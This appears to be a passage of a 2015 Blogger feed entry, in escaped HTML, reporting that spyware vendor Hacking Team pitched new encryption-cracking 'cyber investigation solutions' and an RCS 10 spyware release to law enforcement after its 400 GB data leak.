&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;insidearticlead&quot; style=&quot;border: 0px; clear: both; font-family: &#39;PT Sans&#39;, arial, sans-serif; font-size: 17px; font-stretch: inherit; line-height: 30px; margin: 15px 10px -10px 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;div style=&quot;border: 0px; float: left; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px 15px 0px 0px; vertical-align: baseline;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 15px 0px 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;aim25290401657040179827&quot; style=&quot;border: 0px; font-family: &#39;PT Sans&#39;, arial, sans-serif; font-size: 17px; font-stretch: inherit; line-height: 30px; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;br style=&quot;content: &amp;quot; &amp;quot;; display: block; margin: 20px 0px 0px; outline: 0px; padding: 0px;&quot; /&gt;&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
The announcement came in an email pitch sent to existing and potential new customers on October 19 when Hacking Team CEO&amp;nbsp;&lt;b style=&quot;background: transparent; border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;David Vincenzetti&amp;nbsp;&lt;/b&gt;confirmed that Hacking Team is now&lt;i style=&quot;background: transparent; border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&quot;finalizing [its] brand new and totally unprecedented cyber investigation solutions.&quot;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;br style=&quot;content: &amp;quot; &amp;quot;; display: block; margin: 20px 0px 0px; outline: 0px; padding: 0px;&quot; /&gt;&lt;/div&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
The e-mail is not made public, but Motherboard has been able to&amp;nbsp;&lt;a href=&quot;http://motherboard.vice.com/en_uk/read/hacking-team-is-back-with-a-bold-pitch-to-police&quot; rel=&quot;nofollow&quot; style=&quot;border: 0px; color: #3d5a99; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: bold; line-height: inherit; margin: 0px; outline: none; padding: 0px; text-decoration: none; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;obtain&lt;/a&gt;&amp;nbsp;a copy of it that states:&lt;/div&gt;
&lt;blockquote class=&quot;tr_bq&quot; style=&quot;background: rgb(249, 249, 249); border-color: rgb(221, 221, 221) rgb(221, 221, 221) rgb(221, 221, 221) rgb(191, 202, 218); border-radius: 5px; border-style: double double double solid; border-width: 0px 0px 0px 8px; color: black; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 10px; outline: 0px; overflow: hidden; padding: 10px; quotes: none; vertical-align: baseline;&quot;&gt;
&lt;i style=&quot;background: transparent; border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&quot;Most [government agencies] in the United States and abroad will become &#39;blind,&#39; they will &#39;go dark,&#39; they will simply be unable to fight vicious phenomena such as terrorism,&quot;&amp;nbsp;&lt;/i&gt;wrote Vincenzetti.&amp;nbsp;&lt;i style=&quot;background: transparent; border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&quot;Only the private companies can help here; we are one of them.&quot;&lt;br style=&quot;content: &amp;quot; &amp;quot;; display: block; margin: 20px 0px 0px; outline: 0px; padding: 0px;&quot; /&gt;&quot;It is crystal clear that the present American administration does not have the stomach to oppose the American IT conglomerates and to approve unpopularly, yet totally necessary, regulations,&quot;&lt;/i&gt;&amp;nbsp;He added.&lt;/blockquote&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;br style=&quot;content: &amp;quot; &amp;quot;; display: block; margin: 20px 0px 0px; outline: 0px; padding: 0px;&quot; /&gt;&lt;/div&gt;
&lt;h3 style=&quot;border: 0px; color: black; font-family: inherit; font-size: 1.4em; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
Game Changers&lt;/h3&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;br style=&quot;content: &amp;quot; &amp;quot;; display: block; margin: 20px 0px 0px; outline: 0px; padding: 0px;&quot; /&gt;&lt;/div&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
The brand new cyber investigation solutions here, of which Vincenzetti is talking about, will be &quot;&lt;b style=&quot;background: transparent; border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Game Changers&lt;/b&gt;.&quot;&lt;/div&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;br style=&quot;content: &amp;quot; &amp;quot;; display: block; margin: 20px 0px 0px; outline: 0px; padding: 0px;&quot; /&gt;&lt;/div&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
The announcement came roughly 4 months after a mysterious hacker or group of hackers hacked into Hacking Team&#39;s servers,&amp;nbsp;&lt;b style=&quot;background: transparent; border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;leaking more than 400 gigabytes&lt;/b&gt;&amp;nbsp;of internal data, including:&lt;/div&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;/div&gt;
&lt;ul style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; list-style: none; margin: 20px 20px 20px 35px; outline: 0px; padding: 0px 0px 0px 5px; vertical-align: baseline;&quot;&gt;
&lt;li style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Internal emails&lt;/li&gt;
&lt;li style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Hacking tools&lt;/li&gt;
&lt;li style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Zero-day exploits&lt;/li&gt;
&lt;li style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Surveillance tools&lt;/li&gt;
&lt;li style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Source code for Spyware suite, called Remote Control System (RCS)&lt;/li&gt;
&lt;li style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;A spreadsheet listing every government client with date of purchase and amount paid&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;br style=&quot;content: &amp;quot; &amp;quot;; display: block; margin: 20px 0px 0px; outline: 0px; padding: 0px;&quot; /&gt;&lt;/div&gt;
&lt;h3 style=&quot;border: 0px; color: black; font-family: inherit; font-size: 1.4em; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
Remote Control System Version 10 (RCS 10)&lt;/h3&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;br style=&quot;content: &amp;quot; &amp;quot;; display: block; margin: 20px 0px 0px; outline: 0px; padding: 0px;&quot; /&gt;&lt;/div&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
Since then, Hacking Team has reportedly been working on launching a new revamped 10th edition of its proprietary&amp;nbsp;Remote Control System, RCS 10.&lt;/div&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;br style=&quot;content: &amp;quot; &amp;quot;; display: block; margin: 20px 0px 0px; outline: 0px; padding: 0px;&quot; /&gt;&lt;/div&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
Hacking Team is known for its&amp;nbsp;&lt;b style=&quot;background: transparent; border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Remote Control System&lt;/b&gt;&amp;nbsp;(RCS) spyware, also known as Galileo, which is loaded with a number of zero-day exploits that have the ability to monitor the computers of its targets remotely.&lt;/div&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;br style=&quot;content: &amp;quot; &amp;quot;; display: block; margin: 20px 0px 0px; outline: 0px; padding: 0px;&quot; /&gt;&lt;/div&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
However, it&#39;s still unclear when the company will actually release&amp;nbsp;&lt;b style=&quot;background: transparent; border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;RCS 10&lt;/b&gt;. Also, it is all set to be seen as to which law enforcement agencies will take the Hacking Team offer, given its recent security breach.&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackers24x7.blogspot.com/feeds/4164113872553027723/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackers24x7.blogspot.com/2015/11/hacking-team-offering-encryption.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3275619147523422902/posts/default/4164113872553027723'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3275619147523422902/posts/default/4164113872553027723'/><link rel='alternate' type='text/html' href='http://hackers24x7.blogspot.com/2015/11/hacking-team-offering-encryption.html' title='Hacking Team Offering Encryption Cracking Tools to Law Enforcement Agencies'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzD-MEHFBri1lKMAlWrTixXYg26oU7MflxFLoy6YJFsxfIAexFQMtihb3xKUzbKh_St68f6OinS4JAb_yWG-UPAK4m_NjJiNZFGLGDHb-BuFS8TE5N38V7Pi8k1h_yuxtM5obu0OzDm-UM/s72-c/hacking-team-tools.png" height="72" width="72"/><thr:total>0</thr:total></entry></feed>